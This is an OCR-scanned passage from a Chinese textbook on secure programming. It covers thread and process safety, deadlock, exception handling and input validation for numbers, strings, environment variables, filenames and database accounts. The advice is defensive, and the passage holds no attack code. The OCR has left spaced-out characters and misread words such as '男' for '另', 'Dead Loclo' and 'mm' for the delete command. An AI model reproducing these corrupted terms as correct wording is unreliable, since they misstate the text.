-个 线程 从 创建 、 运 行 到 消亡 的 过 程 ， 称 为 线程 的 生命 周期 。 用 线程 的 状态 (state) 表 明 
线程 处 在 生命 周期 的 哪个 阶段 。 线 程 有 创建 、 可 运行 、 运 行 中 、 阻 塞 、 死 亡 5 种 状态 。 通 过 
线程 的 控制 与 调度 可 使 线程 在 这 几 种 状态 间 转 换 。 这 5 种 状态 详细 描述 如 下 : 

。 创建 状态 :使 用 new 运算 符 创 建 一 个 线程 后 ， 该 线程 仅 是 一 个 空 对 象 ， 系 统 没有 分 


配 资源 ; 
。 可 运行 状态 : 使 用 start( ) 方 法 启动 一 个 线程 后 ， 系 统 分 配 了 资源 ， 使 该 线程 处 于 可 运 
行 状态 Runnable); 


。 运行 中 状态 : 占有 CPU， 执 行 线程 的 run( ) 方 法 ; 

。 阻塞 状态 :运行 的 线程 因 某 种 原因 停止 继续 运行 

。 死亡 状态 :线程 结束 。 

线程 的 安全 隐患 可 能 出 现在 各 个 状态 。 一 般 来 说 ， 线 程 的 安全 性 来 源 于 两 个 方面 : 多 个 
线程 之 间 可 能 会 共享 进程 的 内 存 资源 ; CPU 的 某 个 时 间 片 分 配给 哪个 线程 使 用 ， 默 认 情 况 下 
无 法 由 用 户 控制 。 

默认 情况 下 , 线程 都 是 独立 的 ， 而 且 异 步 执行 ,线程 中 包含 了 运行 时 所 需 的 数据 或 方法 ， 
而 不 需要 外 部 资源 或 方法 ， 也 不 必 关 心 其 他 线程 的 状态 或 行为 。 但 是 多 个 线程 运行 时 在 共享 
数据 的 情况 下 ， 就 需要 考虑 其 他 线程 的 状态 和 行为 ， 否 则 就 不 能 保证 程序 的 运行 结果 的 正确 
性 。 在 某 些 项 目 中 ， 经 常会 出 现 线程 同步 的 问题 ， 即 多 个 线程 在 访问 同一 资源 时 ， 会 出 现 安 
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全 问题 。 

所 谓 同步 ， 就 是 在 发 出 一 个 功能 调用 时 ， 在 得 到 结果 之 前 该 调用 就 不 返回 ， 同 时 其 他 线 
程 也 不 能 调用 这 个 方法 。 通 俗 地 讲 ， 一 个 线程 能 否 抢占 CPU， 必 须 考虑 另 一 个 线程 中 的 某 种 
条 件 ， 而 不 能 随便 让 操作 系统 按照 默认 方式 分 配 CPU， 如 果 条 件 不 具备 ， 就 应 该 等 待 男 一 个 
线程 运行 ， 直 到 条 件 具 备 。 

有 些 情况 下 ， 多 个 线程 合作 完成 一 件 事 情 ， 此 时 线程 之 间 实 现 了 协作 。 如 一 个 工作 需要 
若干 个 步 又， 各 个 步骤 都 比较 耗 时 ， 不 能 因为 它们 的 运行 ， 影 响 程序 的 运行 效果 ， 最 好 将 各 
步骤 用 线程 实现 。 但 由 于 线程 随时 都 有 可 能 抢占 CPU， 可 能 在 前 面 一 个 步骤 没有 完成 时 ， 后 
面 的 步骤 就 已 经 运行 ， 该 安全 隐患 造成 系统 得 不 到 正确 结果 。 

死 锁 (Dead Loclo) 是 指 两 个 或 两 个 以 上 的 线程 在 执行 过 程 中 ， 因 争夺 资源 而 造成 的 一 种 互 
相等 待 的 现象 。 此 时 称 系统 处 于 死 锁 状 态 ， 这 些 永远 在 互相 等 待 的 线程 称 为 死 锁 线 程 。 

产生 死 锁 的 4 个 必要 条 件 是 : 

。 互 斥 条 件 ， 资 源 每 次 只 能 被 一 个 线程 使 用 ; 

。 请 求 与 保持 条 件 ， 一 资源 而 阻塞 时 ， 对 已 获得 的 资源 保持 不 放 ; 

。 ”不 剥夺 条 件 ， 进 程 已 获得 的 资源 ， 在 未 使 用 完 之 前 ， 不 管 其 是 否 阻塞 ， 无 法 强行 剥 

夺 

。 循环 等 待 条 件 ， 若 干 进程 之 间 互 相等 待 ， 形 成 一 种 头 尾 相 接 的 循环 等 待 资源 关系 。 

这 4 个 条 件 是 死 锁 的 必要 条 件 ， 只 要 系统 发 生死 锁 ， 这些 条 件 必然 成 立 ， 而 只 要 上 述 条 
件 中 的 一 个 不 满足 ， 就 不 会 发 生死 锁 。 

线程 控制 主要 是 对 线程 生命 周期 的 一 些 操作 ， 如 和 暂停、 继续 、 消 亡 等 。Java 提供 了 对 线 
程 生命 周期 进行 控制 的 一 些 函 数 : 

© stop( )， 停 止 线程 ; 

e suspend( )， 和 暂停 线程 的 运行 ; 

* resume( )， 继 续 线 程 的 运行 ; 

* destroy( )， 让 线程 销毁 。 

线程 生命 周期 中 的 安全 问题 主要 体现 在 : 线程 暂停 或 终止 时 ， 可 能 对 某 些 资源 的 锁 并 没 
有 释放 ， 它 所 保持 的 任何 资源 都 会 保持 锁定 状态 ， 线 程 暂 停 后 ， 我 们 无 法 预计 它 什么 时 候 会 
继续 (一 般 与 用 户 操作 有 关 )， 如 果 对 某 个 资源 的 锁 长 期 被 保持 ， 其 他 线程 在 任何 时 候 都 无 法 
再 次 访问 该 资源 ， 极 可 能 造成 死 锁 。 针 对 这 个 问题 ， 为 减少 出 现 死 锁 的 可 能 ，Java 1.2 中 将 
Thread 类 的 stop( )、suspend( )、resume( ) 以 及 destroy ) 方 法 定义 为 “已 过 时 ”方法 ， 不 再 推 
荐 使 用 。 

进程 是 执行 中 的 程序 , 对 每 个 进程 来 说 , 都 有 自己 独立 的 一 片 内 存 空间 和 一 组 系统 资源 。 
进程 由 进程 控制 块 、 程 序 段 、 数 据 段 三 部 分 组 成 。 在 进程 概念 中 ， 每 个 进程 的 内 部 数据 和 状 


态 都 是 完全 独立 的 。 

一 个 进程 可 以 包含 若干 线程 ， 进 程 也 有 运行 、 阻 塞 、 就 绪 三 种 状态 ， 并 随 着 一 定 条 件 而 
相互 转换 。 

由 于 进程 的 独立 性 ， 从 应 用 角度 看 ， 进 程 安全 比 线程 安全 更 受 重 视 ， 一 般 针 对 已 有 的 进 
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程 进行 安全 方面 的 控制 。 比 如 : 在 系统 安全 中 发 现 并 清除 病毒 进程 ， 在 网 络 应 用 中 优化 守护 
进程 或 端口 扫描 进程 等 。 

从 开发 者 (编程 ) 角 度 看 ， 进 程 的 安全 所 需要 考虑 的 问题 与 线程 类 似 ， 但 由 于 线程 能 够 共 
享 进程 的 资源 ， 所 以 线程 安全 一 般 考 虑 的 问题 比 进程 安全 要 多 。 不 过 ， 对 于 开发 多 个 进程 能 
够 运行 的 系统 软件 (如 操作 系统 )， 进 程 的 安全 就 应 该 重点 考虑 了 。 一 般 情 况 下 ， 此 时 考虑 的 
问题 和 线程 安全 类 似 ， 因 为 在 这 种 软件 中 ， 各 个 进程 在 使 用 系统 中 有 限 的 资源 ， 与 线程 安全 
中 考虑 的 问题 相似 。 


3.24 ”异常 与 错误 处 理 中 的 安全 


异常 /错误 处 理 是 程序 设计 中 的 常见 内 容 ， 异 常 /错误 处 理 的 技巧 和 程序 的 安全 性 具有 密 
切 的 关系 。 科 学 的 异常 /错误 处 理 方法 是 系统 安全 性 的 重要 保障 。 

一 般 来 说 ， 开 发 过 程 中 可 能 出 现 的 问题 有 如 下 几 种 : 

编译 错误 ,语法 写 错 了 ， 比 如 在 CH}, inta 写成 了 Inta， 这 种 错误 ， 编 译 器 能 够 进行 
提示 ， 一 般 比 较 容易 解决 。 

运行 错误 ， 语 法 没有 问题 ， 但 在 运行 时 发 生 了 问题 。 比 如 连接 数据 库 的 代码 本 来 是 正确 
的 ， 但 运行 时 数据 库 突然 断 电 ， 程 序 不 能 正常 运行 ， 这 是 在 代码 编写 阶段 应 该 预计 到 的 ， 可 
由 异常 处 理解 决 (Java 语言 中 定义 了 Eror 和 Exception， 都 是 为 了 解决 此 类 问题 )， 在 某 些 语 
言 (如 VB) 中 ,没有 面向 对 象 的 异常 处 理 机 制 ， 此 时 设计 了 面向 过 程 的 错误 处 理 方法 来 解决 这 
个 问题 。 

另 一 种 是 多 辑 错误 ， 程 序 语 法 没有 问题 ， 也 没有 异常 ， 但 得 不 到 正确 结果 ， 这 需要 靠 程 
序 员 非 常 高 超 的 编程 经 验 来 进行 处 理 ， 这 不 属于 本 节 探 讨 的 范围 。 

如 前 所 述 ， 异 常 主要 是 针对 程序 语法 没有 问题 时 ， 在 运行 的 过 程 中 出 现 的 突 发 情况 。 蜡 
常 的 出 现 ， 是 在 程序 编译 通过 的 情况 下 ， 程 序 运行 过 程 中 出 现 一 些 突 发 情况 造成 的 ， 处 理 这 
些 突 发 情况 ， 需 要 有 良好 的 预见 性 ， 预 先进 行 处 理 ， 以 保证 系统 的 安全 性 ， 这 对 程序 员 提 出 
了 更 高 要 求 。 实 际 上 ， 不 可 能 预见 程序 可 能 出 现 的 所 有 异常 。 

常见 异常 可 能 出 现 的 场合 如 下 : 

e 访问 数据 库 时 ， 数 据 库 停止 工作 ; 

o 访问 文件 ， 文 件 恰好 被 男 一 个 程序 访问 ; 

。 输入 一 个 以 0 作为 除数 的 数值 ; 

。 类 型 转换 、 对 象 示 分 配 内 存 等 。 

从 上 面 可 能 出 现 异常 的 场合 可 以 看 出 ， 异 常 是 几乎 所 有 高 级 语言 都 可 能 出 现 的 情况 ， 在 
面向 对 象 的 语言 中 ，C++、C# 等 也 会 出 现 类 似 的 情况 ， 包 括 一 些 非 面向 对 象 的 语言 ， 如 VB， 
也 必须 面 对 程 序 运行 过 程 中 的 异常 现象 。 虽然 处 理 方法 不 同 ， 但 本 质 类 似 。 

当 系 统 底 层 出 现 异常 时 ， 实 际 上 是 将 异常 用 对 和 象 封装 起 来 ， 传 给 调用 方 (客户 端 ， 俗 称 
抛 出 (throw)。 如 在 程序 里 面 发 生 了 数字 格式 异常 ， 这 个 异常 在 底层 就 被 封装 成 javalang. 
NumberFormatException 对 和 象 抛 出 。 异常 对 象 抛 出 给 函数 的 调用 者 , 如 果 调 用 者 具有 对 异常 处 
理 的 代码 ， 则 对 异常 进行 处 理 ， 否 则 将 异常 继续 向 前 抛 出 ， 如 果 直 到 用 户 端 还 没有 对 异常 进 
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行 处 理 ， 异 常 将 在 标准 输出 (如 控制 台 ) 中 打印 。 对 于 非 面向 对 象 语言 ， 异 常 出 现 的 原理 类 似 。 

程序 中 可 能 出 现 的 异常 有 很 多 种 类 ， 如 算术 异常 (除数 为 0 等 )、 数 组 越界 异常 、 类 型 转 
换 异常 、 分 配 内 存 异 常 、 数 字 格 式 异常 等 。 

异常 出 现 后， 可 通过 查看 文档 来 了 解 发 生 的 原因 。 但 是 ， 了 解 异 常 出 现 的 原因 并 不 是 最 
终 目的 ， 为 保证 系统 的 正常 和 安全 运行 ， 将 异常 进行 有 效 的 处 理 ， 才 是 我 们 所 需要 的 。 要 进 
行 异常 处 理 ， 首 先 必须 对 异常 进行 捕获 (catch)， 在 面向 对 象 的 语言 中 ， 可 以 有 两 种 方法 捕获 
异常 ， 就 地 捕捉 异常 和 将 异常 向 前 端 ( 调 用 方 ) 抛 出 。 当 一 个 模块 中 可 能 出 现 异常 时 ， 一 般 情 
况 下 ， 可 就 地 捕捉 异常 ， 过 程 如 下 : 

。 用 try 块 将 可 能 出 现 异常 的 代码 包 起 来 ; 

。 用 catch 块 来 捕获 异常 并 处 理 异常 ; 

。 如 果 有 一 些 工作 是 不 管 异常 是 否 出 现 都 要 执行 的 ， 则 将 相应 的 代码 用 finally 块 包 起 来 。 

如 前 所 述 ， 一 个 try 后 面 必须 至 少 接 一 个 catch， 可 以 不 接 finally， 但 最 多 只 能 有 一 个 
finaly。 我 们 知道 ， 代 码 中 可 能 出 现 的 异常 有 很 多 种 类 。 如 Java 中 常见 的 就 有 : 未 分 配 内 存 
的 异常 、 未 找到 文件 的 异常 、 数 据 库 异 常 、 格 式 转换 异常 、 类 型 转换 异常 等 。 由 于 无 法 对 所 
有 异常 进行 预见 ， 怎 样 尽 可 能 多 地 捕获 程序 中 可 能 出 现 的 异常 呢 ? 

由 于 try 块 后 面 可 以 接 多 个 catch 块 , 因此 可 用 某 一 个 catch 捕获 某 种 异常 。 当 try 中 出 现 
异常 时 ， 程 序 将 在 catch 中 寻找 是 否 有 相应 的 异常 类 型 的 处 理 代码 ， 如 果 找 到 就 处 理 ， 如 果 
没有 找到 就 继续 向 下 找 。 

在 异常 处 理 过 程 中 ，finally 块 是 可 选 的 ， 实 际 上 ，finally 是 为 了 更 大 程度 上 保证 程序 的 
安全 性 。 异 常 通常 有 两 种 处 理 方法 .就 地 处 理 和 向 客户 端 传递 。 就 地 处 理 就 是 在 出 现 异常 的 
模块 中 处 理 异常 。 程 序 中 的 异常 ， 是 就 地 处 理 比较 好 还 是 向 客户 端 传递 比较 好 ? 此 处 要 遵循 
下 列 原 则 : 就 地 处 理 方法 可 以 很 方便 地 定义 提示 信息 ， 对 于 一 些 比较 简单 的 异常 处 理 ， 可 以 
选用 这 种 方法 ， 向 客户 端 传递 的 方法 ， 其 优势 在 于 可 以 充分 发 挥 客户 端的 能 力 ， 如 果 异 常 的 
处 理 依赖 于 客户 端 ， 或 者 某 些 处 理 过 程 在 本 地 无 法 完成 ， 就 必须 向 客户 端 传 递 。 例 如 ， 数 据 
库 连 接 代码 可 能 出 现 异常 ， 但 是 异常 的 处 理 最 好 传递 给 客户 端 ， 因 为 客户 端 在 调用 这 块 代码 
时 ， 可 能 要 根据 实际 情况 ， 获 取 环境 参数 ， 进 行 比较 复杂 的 处 理 。 

这 样 做 的 好 处 是 : 在 客户 端 可 以 进行 更 丰富 的 异常 处 理 ， 不 仅 增加 了 可 扩展 性 ， 也 可 以 
做 到 更 安全 的 代码 保障 。 所 以 ， 一 般 情况 下 ， 模 块 中 的 异常 ， 如 果 确定 可 以 就 地 处 理 则 就 地 
处 理 ， 和 否则 就 应 该 向 客户 端 抛 出 。 不 过 ， 蜡 常 不 断 向 客户 端 抛 出 ， 会 增加 系统 开销 。 实 际 上 ， 
在 自 定义 异常 的 时 候 也 会 遇见 相同 的 问题 ， 其 原则 类 似 。 

综合 各 种 语言 的 特性 ， 异 常 处 理 机 制 一 共有 两 种 : 

1) 面向 对 象 的 异常 处 理 机 制 。 主 要 针对 面向 对 象 的 语言 ,一般 使 用 try-catch-finally 结构 
来 处 理 异 常 ， 前 面 所 述 的 异常 处 理 机 制 都 是 面向 对 和 象 的 异常 处 理 机 制 。 

2) 面向 过 程 的 异常 处 理 机 制 。 实 际 上 ， 对 于 一 些 非 面向 对 象 的 语言 ， 如 VB， 早期 也 具 
有 蜡 常 处 理 机 制 ， 这 就 是 面向 过 程 的 异常 处 理 机 制 。 甚 至 在 面向 对 象 的 语言 , 如 VB.NET 中 ， 
除了 推出 面向 对 象 的 异常 处 理 机 制 外 ， 也 保留 了 面向 过 程 的 异常 处 理 机 制 ， 主 要 以 On Error 
结构 为 代表 。 
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325 输入 安全 


输入 是 一 个 很 广泛 的 概念 ， 既 是 用 户 和 软件 之 间 的 交互 手段 ， 也 是 软件 内 部 模块 之 间 的 
交互 手段 。 针 对 软件 用 户 的 输入 有 很 多 类 型 ， 比 如 : 用 户 在 软件 上 输入 一 个 命令 ， 进 行 相应 
操作 ， 用 户 输入 自己 的 账号 密码 ， 进 行 登录 验证 : 用 户 输入 一 个 关键 字 ， 进 行 查询 等 。 模 块 
之 间 进 行 数据 传递 时 ， 也 会 有 相应 输入 ， 比 如 : 一 个 模块 调用 另 一 个 模块 时 ， 输 入 一 些 参数 ， 
一 个 模块 读 取 一 个 配置 文件 ， 以 对 自己 的 行为 进行 配置 等 。 从 程序 本 身 的 角度 讲 ， 很 多 情况 
下 ， 软 件 的 安全 问题 就 出 在 输入 ;从 攻击 者 的 角度 讲 ， 输 入 是 进行 攻击 的 重要 手段 。 经 过 调 
查 总 结 ， 大 部 分 的 软件 安全 问题 来 源 于 应 用 程序 接受 输入 数据 前 ， 没 有 进行 安全 性 验证 。 很 
明显 ， 如 果 任 由 用 户 输入 而 不 进行 检查 ， 用 户 就 可 以 输入 其 他 对 系统 有 害 的 命令 ， 如 mm( 删 
除 ) 命 令 ， 带 来 的 危害 是 巨大 的 。 解 决 上 面 问题 的 方法 显然 是 进行 安全 性 验证 ， 对 于 编程 人 员 
来 说 ， 程 序 的 所 有 输入 数据 ， 在 被 进行 安全 性 验证 之 前 ， 都 被 认为 是 有 害 的 。 一 旦 忽略 了 这 
条 规则 ， 程 序 就 可 能 遭受 攻击 。 

以 上 规则 看 似 容易 ， 也 容易 理解 ， 但 在 传统 情况 下 ， 安 全 性 验证 往往 被 忽略 掉 。 主 要 原 

因 如 下 : 
1) 在 同一 软件 中 , 由 于 每 一 个 输入 到 达 最 后 的 执行 模块 的 过 程 中 , 都 需要 经 过 许多 关口 ， 
每 个 关口 都 有 可 能 进行 检查 。 但 就 是 因为 这 样 ， 许 多 开发 人 员 都 假定 这 些 数据 在 通过 其 他 关 
时 ， 已 经 由 其 他 关口 的 应 用 程序 函数 检查 过 了 ， 回 避 了 对 输入 的 检查 ， 不 愿意 牺牲 性 能 去 
对 数据 进行 多 次 校 验 ， 结 果 导 致 大 家 都 没有 进行 验证 。 

2) 随 着 软件 的 分 工 ， 现 在 许多 应 用 程序 的 功能 都 分 块 分 布 在 不 同 机 器 上 (如 客户 机 器 和 
服务 器 上 ， 或 者 对 等 机 器 上 )， 开 发 人 员 有 充足 理由 依赖 应 用 程序 的 其 他 模块 提供 安全 检验 。 

从 上 面 的 例子 又 可 以 看 出 ， 输 入 安全 解决 不 好 ， 在 严重 的 情况 下 ， 可 能 会 带 来 巨大 的 危 
害 。 要 想 防御 应 用 程序 可 能 受到 的 输入 攻击 ， 最 简单 有 效 的 方法 是 : 在 对 输入 进行 任何 一 步 
处 理 之 前 ， 必 须 对 数据 安全 进行 验证 。 数 据 安全 验证 ， 说 起 来 比较 容易 ， 做 起 来 要 考虑 很 多 
问题 ， 由 于 很 多 软件 开发 者 感觉 数据 安全 验证 太 容易 ， 反 而 会 忽略 科学 的 方法 。 

在 对 输入 进行 检查 时 , 为 了 保证 实际 工作 的 可 行 性 , 在 设计 时 , 可 以 采用 以 下 几 个 策略 : 

1) 尽量 让 程序 可 以 输入 的 入 口 少 一 些 。 这 样 的 话 ， 如 果 程 序 分 为 若干 个 模块 ， 那么 攻击 
者 直接 和 某 些 模块 通信 的 概率 大 大 降低 ， 也 就 是 说 ， 攻 击 者 进入 程序 的 途径 将 大 大 减少 ， 同 
时 限制 了 各 模块 之 间 的 通信 路 径 进行 攻击 的 可 能 ， 安 全 验证 的 代价 大 大 减 小 。 

2) 尽量 让 输入 所 允许 的 输入 类 型 少 一 些 。 这 样 可 以 让 验证 的 工作 更 加 简化 。 比 如 ， 如 果 
仅 允 许 输入 的 值 为 数字 ， 那 么 验证 时 只 需要 针对 数字 进行 验证 ， 验 证 是 相对 简单 的 ， 如 果 将 
输入 设计 为 任何 字符 串 都 可 以 输入 ， 那 么 将 要 考虑 更 多 问题 ， 验 证 难度 将 会 增加 很 多 。 

3) 严格 检查 不 可 信 的 输入 。 不 仅 在 数据 最 初 进入 程序 时 要 执行 检查 ,而 且 在 程序 实际 使 
用 这 些 数据 时 ， 也 要 进行 检查 。 当 然 ， 检查 的 项 目 可 以 不 一 样 , 但 是 检查 应 该 是 时 时 存在 的 。 
不 过 ， 相 对 来 说 ,更 重要 的 是 数据 在 使 用 之 前 的 检查 。 一 般 情况 下 ,我 们 可 以 采用 如 下 方法 : 
数据 在 进入 模块 时 ， 在 各 个 模块 内 进行 针对 该 模块 的 安全 检查 。 

4) 转变 观念 ， 从 定义 “非法 ”到 定义 “合法 ”安全 程序 开发 人 员 往往 有 个 误区 ， 它 们 
首先 定义 的 是 “什么 样 的 数据 非法 ? ”， 这 个 定义 很 容易 给 出 ， 比 如 ，email 地 址 中 可 以 定义 
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没有 “@” 符 号 为 非法 ， 但 这 是 不 安全 的 。 因 为 不 可 能 将 所 有 非法 的 数据 都 加 以 定义 ， 攻 击 
者 非常 聪明 ， 他 们 常常 会 想 出 其 他 的 非法 数据 。 定义 “什么 是 非法 ”， 容 易 想 到 ,但 是 无 法 定 
AX. 但 是 定义 “什么 是 合法 ” 就 相对 容易 得 多 。“ 正 确 答案 只 有 几 个 ， 而 错误 答案 可 以 有 
很 多 个 ”， 就 是 这 个 道理 。 

所 以 应 该 做 的 是 确定 “什么 样 的 数据 是 合法 的 ? ”。 在 数据 输入 时 ， 检 查 数据 是 否 符合 
定义 ， 只 接受 符合 定义 的 数据 ;而 不 是 检查 数据 是 否 不 符合 定义 ， 拒 绝 不 符合 定义 的 数据 。 

例如 ， 有 一 个 程序 ， 根 据 用 户 的 输入 ， 创 建 一 个 文件 。 很 显然 ， 有 些 字符 ， 如 “/” 是 
不 允许 的 。 但 是 仅 去 检查 一 个 字符 也 不 够 ， 其 他 字符 ， 如 控制 字符 、 空 格 、 横 线 等 ， 都 有 可 
能 不 合法 。 即 使 创建 了 一 个 “非法 ”字符 的 列表 ， 也 可 能 没有 办 法 定义 完全 ， 因 为 总 可 能 有 
没有 考虑 到 的 情况 。 因 此 ， 正 确 的 方法 应 该 是 : 确定 文件 名 输入 的 一 种 安全 的 特定 格式 ， 而 
拒绝 不 符合 这 种 特定 格式 的 所 有 输入 。 

1. 数字 安全 问题 


数字 的 输入 安全 是 比较 常见 的 。 比 如 在 表单 上 输入 一 个 人 的 年 龄 , 一 般 就 会 有 范围 限制 。 
对 数字 的 安全 检查 主要 有 : 格式 ， 如 整数 、 小 数 等 ， 精 度 ， 如 小 数 保留 的 位 数 等 ， 范围， 如 
某 个 输入 数字 的 大 小 取 值 范围 等 ， 类 型 和 范围 的 匹配 ， 如 为 了 预防 整数 溢出 ， 对 短 整数 的 输 


入 进行 范围 检查 。 
针对 数字 输入 的 安全 要 注意 以 下 几 点 : 


1) 确定 数字 格式 。 比 如 ， 有 的 系统 中 数字 是 阿拉 伯 数 字 ， 也 有 的 系统 支持 中 文 数字 (如 
一 二 三 ， 甚 至 壹 武佐 等 ) 输 入 ， 有 的 系统 中 数字 每 三 位 就 有 一 个 逗号 等 。 一 般 情 况 下 ， 可 用 正 
则 表达 式 来 验证 字符 串 是 不 是 数字 ， 然 后 进行 数字 的 安全 检查 。 

2) 对 于 负数 的 验证 。 一 般 最 好 不 要 根据 有 没有 符号 位 来 确定 该 数 是 不 是 负数 。 因为 有 些 
程序 中 ， 如 果 输 入 一 个 很 大 的 正 数 ， 也 可 能 导致 数值 “溢出 ”而 变 成 一 个 负数 ， 对 于 负数 的 
验证 要 进行 一 些 底层 的 判断 。 

3) 特别 要 注意 判断 数值 溢出 (如 整数 溢出 ) 的 问题 。 


2. 字符 串 安全 问题 


关于 对 字符 串 的 验证 ， 有 以 下 问题 值得 注意 : 

1) 如 果 使 用 正则 表达 式 , 最 好 明确 指出 要 匹配 数据 的 开始 (通常 用 “^” 来 标识 ) 和 结束 ( 通 
常用 “$” 来 标识 )。 和 否则 ， 攻 击 者 可 能 在 输入 中 嵌入 攻击 文本 ， 并 能 绕 过 安全 检查 。 

2) 尽 可 能 在 输入 中 拒绝 特殊 字符 。 因 为 有 很 多 特殊 字符 在 某 些 系统 中 拥有 特殊 含义 ,如 
“\”， 在 Windows 系统 中 可 能 作为 文件 路 径 分 隔 符 。 在 开发 阶段 这 个 问题 可 能 不 容易 引起 注 
意 ， 但 可 能 被 攻击 者 利用 。 

3. 环境 变量 安全 问题 


环境 变量 的 输入 也 可 能 给 攻击 者 带 来 机 会 。 主 要 来 源 于 : 
1) 环境 变量 的 内 容 给 攻击 者 留 下 机 会 。 有 些 系统 中 , 环境 变量 存储 了 和 系统 有 关 的 一 些 
配置 信息 ， 如 在 Linux 中 ， 很 多 程序 配置 被 环境 变量 以 某 些 隐 含 、 模 糊 或 未 公开 的 方式 所 定 
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义 。 例 如 ，sh 和 bash shell 使 用 IFS 变量 来 决定 分 隔 命令 行 参 数 的 字符 。 那 么 ， 在 执行 一 个 
shell 时 ， 把 IFS 设置 为 某 些 值 ， 就 可 能 进行 攻击 。 另 一 方面 ， 由 于 并 不 是 所 有 环境 变量 都 有 
文档 的 说 明 ， 这 让 用 户 直 到 攻击 后 无 所 适 从 ; 并 且 由 于 环境 变量 的 可 编辑 性 ， 攻 击 者 甚至 可 
以 增加 一 些 更 危险 的 环境 变量 ， 从 而 达到 攻击 的 目的 。 

2) 环境 变量 的 存储 格式 给 攻击 者 留 下 机 会 。 在 Linux F, 环境 变量 在 底层 ,通常 是 以 字 
符 串 数组 形式 存储 的 ， 这 个 字符 串 指针 数组 有 一 个 头 指针 ， 该 数组 中 ， 按 顺序 存储 各 个 环境 
变量 ， 每 个 环境 变量 是 这 个 数组 中 的 一 个 元 素 ， 该 数组 以 NULL 指针 结尾 。 每 一 个 元 素 的 格 
式 都 为 : “NAME=value”。 这 潜在 地 表明 , 环境 变量 名 不 能 包含 等 号 ,也 不 能 包含 一 些 其 他 敏 
感 符号 , 如 NIL(ASCI 码 为 0 的 字符 ,一 般 表示 字符 串 结 尾 )。 如 果 这 一 点 被 攻击 者 利用 ,就 
可 能 会 给 系统 带 来 损害 。 

要 解决 以 上 安全 问题 ， 可 从 以 下 几 个 方面 着 手 : 

。 限制 环境 变量 的 使 用 权限 ; 

。 可 适当 破坏 环境 变量 在 shell 之 间 的 共享 ; 

。 对 用 户 定义 的 环境 变量 ， 需 要 进行 严格 的 检查 。 

4. 文件 名 安全 问题 


在 很 多 与 文件 输出 有 关 的 系统 中 ， 文 件 名 可 能 成 为 安全 隐患 。 无 论 在 什么 样 的 操作 系统 
中 ， 文 件 名 应 该 遵循 以 下 安全 原则 ; 

1) 不 要 让 用 户 自 己 输入 文件 名 ， 应 在 界面 上 给 用 户 一 个 默认 的 文件 名 。 如 Windows 中 
将 文件 另存 时 ， 界 面 的 “文件 名 ” 框 中 会 显示 一 个 默认 的 合法 名 称 ， 避 免 用 户 因为 输入 一 些 
不 合法 的 文件 名 造成 安全 问题 。 

2) 如 果 不 得 不 让 用 户 输入 文件 名 , 那么 将 文件 名 限制 为 上 只 能 包含 字母 和 数字 。 特别 应 该 
考虑 将 一 些 特殊 字符 (如 “/”“\”、“-” 以 及 “*””“? ”“[ ]”“{ }” 等 通配符 ) 从 合法 模 
式 中 去 掉 。 

3) 不 要 允许 用 户 命 名 一 些 可 能 和 物理 设备 冲突 的 文件 名 。 比 如 ,在 一 些 系 统 中 ,一些 文 
件 名 可 以 被 认为 是 物理 设备 。 例如， 如 果 一 个 程序 试图 打开 COM1 文件 ， 则 可 能 被 系统 误解 
为 尝试 和 串口 通信 ， 系 统 就 去 进行 串口 的 读 写 ， 而 该 操作 又 不 符合 用 户 的 期 望 。 因 此 ， 这 种 
文件 命名 也 要 避免 。 

5. 数据 库 安全 问题 


数据 库 (Database，DB)， 顾 名 思 义 ， 是 存放 数据 的 地 方 。 在 计算 机 中 ， 数 据 库 包括 两 方 
面 的 含义 : 数据 本 身 和 数据 库 对 象 。 不 同 的 数据 库 产品 ， 对 数据 都 有 不 同 的 定义 ， 但 是 展现 
给 用 户 的 数据 库 对 象 都 类 似 ， 主 要 有 表 (Table)、 视 图 (View)、 存 储 过 程 (Stored Procedure) fil 
发 器 (Trigger) 等 。 其 中 ， 表 是 最 常用 、 最 基本 的 数据 库 对 象 。 关 于 这 些 数据 库 对 象 的 定义 ， 
可 以 参考 相关 文档 。 

数据 库 一 般 用 数据 库 管理 系统 (DBMS) 进 行 管理 ， 数 据 库 管理 系统 是 用 于 管理 数据 的 计 
算 机 软件 。 利 用 数据 库 管 理 系统 ， 用 户 能 方便 地 定义 和 操纵 数据 ， 维 护 数据 的 安全 性 和 完整 
性 ， 以 及 进行 多 用 户 下 的 并 发 控制 和 恢复 数据 库 ， 一 般 情况 下 ， 我 们 所 说 的 “数据 库 软件 ” 
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是 指数 据 库 管理 系统 。 

目前 ， 常 用 的 数据 库 管 理 系统 有 Access, Oracle, Sybase, FoxPro, DB2, Informix, SQL 
Server 等 ， 它 们 在 各 种 联机 事务 处 理 、 数 据 仓库 、 电 子 商 务 、 信 息 管理 系统 、 决 策 支持 系统 、 
办 公 自 动 化 系统 、 企 业 资源 计划 、 网 站 建设 等 方面 都 有 着 广泛 的 应 用 。 

攻击 者 通过 对 数据 库 的 恶意 输入 ， 可 将 信息 注入 正在 运行 的 进程 ， 获 取 敏 感 数据 ， 甚 至 
危害 进程 的 运行 状态 。 

6. 账户 和 口令 安全 问题 


在 应 用 程序 中 ， 连 接 到 数据 库 ， 通 常 要 使 用 正确 的 账户 和 口令 。 但 很 多 程序 员 直 接 用 管 
理 员 账 户 连接 到 数据 库 ， 例 如 在 SQL Server 中 ， 以 sa(Super Administrator， 超 级 管理 员 账 户 ) 
进行 连接 ， 这 样 很 危险 。 在 Oracle 数据 库 中 ， 以 system 进行 连接 也 是 很 危险 的 ， 它 们 都 是 功 
能 强大 且 很 可 能 对 各 自 系统 造成 损害 的 账户 。 

实际 上 ， 应 用 程序 的 使 用 ， 并 不 一 定 要 用 到 管理 员 账户 ， 使 用 管理 员 账户 ， 反 而 给 了 攻 
击 者 更 多 的 机 会 。 如 在 SQL Server 中 ， 当 连接 以 sa 账户 进行 ， 且 SQL 代码 中 有 bug 时 ， 攻 
击 者 可 执行 任何 管理 员 账户 可 以 执行 的 任务 ， 比 如 : 删除 系统 中 的 数据 库 或 表 ， 删 除 系统 中 
表 中 的 数据 ;修改 系统 中 表 中 的 数据 ;修改 存储 过 程 、 触 发 器 ;删除 日 志 ， 添 加 新 的 数据 库 
用 户 等 。 

很 多 情况 下 ， 程 序 员 会 将 口令 以 明文 形式 存放 于 代码 中 ， 运 行 阶段 ， 这 些 口令 置 入 进程 
的 内 存 空间 。 此 时 ， 口 令 如 果 被 攻击 者 获知 ， 则 可 执行 攻击 者 希望 执行 的 任何 代码 ， 危 险 性 
也 很 大 。 解 决 以 上 问题 的 方法 主要 有 : 尽量 不 使 用 管理 员 账 户 ， 使 用 最 小 特权 账户 ， 不 给 予 
